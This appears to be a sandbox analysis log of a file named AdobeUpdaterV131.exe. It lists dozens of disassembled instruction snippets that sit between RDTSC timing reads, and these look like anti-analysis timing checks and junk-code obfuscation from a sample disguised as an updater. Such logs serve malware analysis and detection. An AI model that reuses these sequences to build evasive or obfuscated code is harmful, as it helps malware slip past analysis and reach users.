Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4EA04D8 second address: 4EA04F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CAAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esp, ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4EA04F0 second address: 4EA04F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4EA04F4 second address: 4EA0511 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4EA0511 second address: 4EA0536 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F09D0D9C3DDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4F01A23 second address: 4F01A67 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dl, A3h 0x00000008 popad 0x00000009 push 00000001h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F09D0731CB9h 0x00000014 and si, EFC6h 0x00000019 jmp 00007F09D0731CB1h 0x0000001e popfd 0x0000001f mov cx, 7477h 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4F01A67 second address: 4F01A80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4F01A80 second address: 4F01A88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx ebx, cx 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4F01AB2 second address: 4F01A23 instructions: 0x00000000 rdtsc 0x00000002 mov dx, 193Ch 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushfd 0x00000009 jmp 00007F09D0D9C3E5h 0x0000000e adc si, 3A96h 0x00000013 jmp 00007F09D0D9C3E1h 0x00000018 popfd 0x00000019 popad 0x0000001a retn 0004h 0x0000001d lea eax, dword ptr [ebp-10h] 0x00000020 push eax 0x00000021 call ebx 0x00000023 mov edi, edi 0x00000025 jmp 00007F09D0D9C3E0h 0x0000002a xchg eax, ebp 0x0000002b jmp 00007F09D0D9C3E0h 0x00000030 push eax 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007F09D0D9C3E1h 0x00000038 jmp 00007F09D0D9C3DBh 0x0000003d popfd 0x0000003e mov di, ax 0x00000041 popad 0x00000042 xchg eax, ebp 0x00000043 jmp 00007F09D0D9C3E2h 0x00000048 mov ebp, esp 0x0000004a jmp 00007F09D0D9C3E0h 0x0000004f push 0000007Fh 0x00000051 pushad 0x00000052 push eax 0x00000053 push edx 0x00000054 movzx eax, di 0x00000057 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 9057DD second address: 9057E2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 9059F2 second address: 9059F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 9059F6 second address: 905A10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jl 00007F09D0731CA8h 0x0000000f pushad 0x00000010 jo 00007F09D0731CA6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4EC0A3C second address: 4EC0A42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4EC0A42 second address: 4EC0A46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4F10DBD second address: 4F10DDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 5FDD4F89h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4F10DDE second address: 4F10DE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4ED05DB second address: 4ED05E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4ED05E1 second address: 4ED05E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4ED05E5 second address: 4ED060D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F09D0D9C3E4h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4ED060D second address: 4ED0613 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4ED0613 second address: 4ED064F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d push edx 0x0000000e movzx esi, bx 0x00000011 pop edx 0x00000012 popad 0x00000013 mov ebp, esp 0x00000015 pushad 0x00000016 movzx eax, dx 0x00000019 call 00007F09D0D9C3E9h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4ED064F second address: 4ED069B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 and esp, FFFFFFF0h 0x00000009 pushad 0x0000000a mov esi, edx 0x0000000c pushfd 0x0000000d jmp 00007F09D0731CAFh 0x00000012 sbb ah, 0000006Eh 0x00000015 jmp 00007F09D0731CB9h 0x0000001a popfd 0x0000001b popad 0x0000001c sub esp, 44h 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F09D0731CADh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4ED069B second address: 4ED06A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4ED06A1 second address: 4ED06BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F09D0731CB1h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4ED06BF second address: 4ED0721 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F09D0D9C3DAh 0x00000009 jmp 00007F09D0D9C3E5h 0x0000000e popfd 0x0000000f pushfd 0x00000010 jmp 00007F09D0D9C3E0h 0x00000015 xor al, FFFFFFD8h 0x00000018 jmp 00007F09D0D9C3DBh 0x0000001d popfd 0x0000001e popad 0x0000001f pop edx 0x00000020 pop eax 0x00000021 mov dword ptr [esp], ebx 0x00000024 pushad 0x00000025 mov dh, al 0x00000027 mov ch, dl 0x00000029 popad 0x0000002a xchg eax, esi 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F09D0D9C3DFh 0x00000032 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4ED0721 second address: 4ED0749 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, bx 0x00000006 jmp 00007F09D0731CABh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 mov ebx, 3428F70Ah 0x00000015 mov ebx, 35E779D6h 0x0000001a popad 0x0000001b xchg eax, esi 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4ED0749 second address: 4ED074D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4ED074D second address: 4ED0753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4ED0753 second address: 4ED0759 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4ED0759 second address: 4ED075D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4ED075D second address: 4ED07D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007F09D0D9C3E4h 0x0000000e mov dword ptr [esp], edi 0x00000011 pushad 0x00000012 push esi 0x00000013 pushfd 0x00000014 jmp 00007F09D0D9C3DDh 0x00000019 and cx, EC96h 0x0000001e jmp 00007F09D0D9C3E1h 0x00000023 popfd 0x00000024 pop ecx 0x00000025 pushfd 0x00000026 jmp 00007F09D0D9C3E1h 0x0000002b sub esi, 7EA76DF6h 0x00000031 jmp 00007F09D0D9C3E1h 0x00000036 popfd 0x00000037 popad 0x00000038 mov edi, dword ptr [ebp+08h] 0x0000003b pushad 0x0000003c mov di, cx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4ED07D9 second address: 4ED082B instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov dword ptr [esp+24h], 00000000h 0x00000010 jmp 00007F09D0731CADh 0x00000015 lock bts dword ptr [edi], 00000000h 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F09D0731CACh 0x00000021 sbb eax, 64C32178h 0x00000027 jmp 00007F09D0731CABh 0x0000002c popfd 0x0000002d movzx ecx, bx 0x00000030 popad 0x00000031 jc 00007F0A427338BAh 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4ED082B second address: 4ED082F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4ED082F second address: 4ED0835 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4ED0835 second address: 4ED0859 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 jmp 00007F09D0D9C3DDh 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F09D0D9C3DDh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4ED0859 second address: 4ED08B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F09D0731CB7h 0x00000009 xor si, 33FEh 0x0000000e jmp 00007F09D0731CB9h 0x00000013 popfd 0x00000014 mov dx, cx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pop ebx 0x0000001b pushad 0x0000001c mov eax, edx 0x0000001e popad 0x0000001f mov esp, ebp 0x00000021 jmp 00007F09D0731CB1h 0x00000026 pop ebp 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4ED08B8 second address: 4ED08BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4ED08BC second address: 4ED08CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CAFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4ED08CF second address: 4ED08D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4ED02DF second address: 4ED0353 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c call 00007F09D0731CAEh 0x00000011 pop ecx 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 jmp 00007F09D0731CB0h 0x0000001a xchg eax, ebp 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F09D0731CADh 0x00000022 sbb si, F356h 0x00000027 jmp 00007F09D0731CB1h 0x0000002c popfd 0x0000002d popad 0x0000002e mov ebp, esp 0x00000030 pushad 0x00000031 mov eax, 7FD82E63h 0x00000036 push ecx 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4ED047D second address: 4ED04B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, eax 0x0000000b jmp 00007F09D0D9C3DEh 0x00000010 cmp ecx, 01h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F09D0D9C3DAh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4ED04B7 second address: 4ED04C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4ED04C6 second address: 4ED04DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F09D0D9C3E4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4ED04DE second address: 4ED04E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4ED04E2 second address: 4ED0534 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F0A42D9E4BAh 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F09D0D9C3E8h 0x00000015 xor cx, 71F8h 0x0000001a jmp 00007F09D0D9C3DBh 0x0000001f popfd 0x00000020 popad 0x00000021 pop edi 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F09D0D9C3E5h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4ED0534 second address: 4ED053A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4ED053A second address: 4ED053E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4ED053E second address: 4ED0582 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c jmp 00007F09D0731CB6h 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 call 00007F09D0731CADh 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4ED0582 second address: 4ED0587 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4ED0587 second address: 4ED0596 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F09D0731CAAh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4E40691 second address: 4E406C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov si, 9645h 0x0000000a popad 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F09D0D9C3DEh 0x00000013 xor ch, FFFFFFD8h 0x00000016 jmp 00007F09D0D9C3DBh 0x0000001b popfd 0x0000001c push eax 0x0000001d push edx 0x0000001e mov cx, 9B25h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4E406C2 second address: 4E40760 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F09D0731CB2h 0x00000008 add ax, C038h 0x0000000d jmp 00007F09D0731CABh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 push eax 0x00000017 pushad 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F09D0731CB5h 0x0000001f xor ax, 0ED6h 0x00000024 jmp 00007F09D0731CB1h 0x00000029 popfd 0x0000002a mov ch, A2h 0x0000002c popad 0x0000002d push ebx 0x0000002e pop edi 0x0000002f popad 0x00000030 xchg eax, ebp 0x00000031 jmp 00007F09D0731CB2h 0x00000036 mov ebp, esp 0x00000038 jmp 00007F09D0731CB0h 0x0000003d sub esp, 10h 0x00000040 jmp 00007F09D0731CB0h 0x00000045 lea eax, dword ptr [ebp-10h] 0x00000048 pushad 0x00000049 push esi 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4E40760 second address: 4E40780 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 mov cx, 16FFh 0x00000009 popad 0x0000000a push dword ptr [ebp+08h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F09D0D9C3E1h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4E40780 second address: 4E407C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov al, dh 0x0000000f pushfd 0x00000010 jmp 00007F09D0731CB4h 0x00000015 adc ax, EE78h 0x0000001a jmp 00007F09D0731CABh 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4E407C2 second address: 4E407FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, di 0x00000006 mov di, 5866h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 movsx ebx, si 0x00000014 pushfd 0x00000015 jmp 00007F09D0D9C3E2h 0x0000001a sub cx, 5808h 0x0000001f jmp 00007F09D0D9C3DBh 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4E40873 second address: 4E40877 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4E40877 second address: 4E4089E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b call 00007F09D0D9C3E7h 0x00000010 pop ecx 0x00000011 movsx ebx, si 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4E4089E second address: 4E408DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F09D0731CB1h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], esi 0x0000000e jmp 00007F09D0731CAAh 0x00000013 push dword ptr [ebp+0Ch] 0x00000016 jmp 00007F09D0731CB0h 0x0000001b lea eax, dword ptr [ebp-08h] 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4E408DD second address: 4E408E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4E408E1 second address: 4E40927 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F09D0731CB8h 0x0000000c add cx, 9BD8h 0x00000011 jmp 00007F09D0731CABh 0x00000016 popfd 0x00000017 popad 0x00000018 nop 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F09D0731CB0h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4E40927 second address: 4E40936 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4E40936 second address: 4E4094E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F09D0731CB4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4E4094E second address: 4E40952 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4E40952 second address: 4E409D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F09D0731CACh 0x00000010 add ch, FFFFFFC8h 0x00000013 jmp 00007F09D0731CABh 0x00000018 popfd 0x00000019 call 00007F09D0731CB8h 0x0000001e pushfd 0x0000001f jmp 00007F09D0731CB2h 0x00000024 add ax, E558h 0x00000029 jmp 00007F09D0731CABh 0x0000002e popfd 0x0000002f pop eax 0x00000030 popad 0x00000031 nop 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 call 00007F09D0731CB0h 0x0000003a pop eax 0x0000003b call 00007F09D0731CABh 0x00000040 pop ecx 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4F10EAA second address: 4F10EB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4F10EB0 second address: 4F10EB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4F10EB6 second address: 4F10EBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4F10EBA second address: 4F10EE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F09D0731CAAh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4F10EE5 second address: 4F10EEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4F10EEB second address: 4F10EFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F09D0731CADh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4F10EFC second address: 4F10F1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 mov ah, C9h 0x00000012 rdtsc
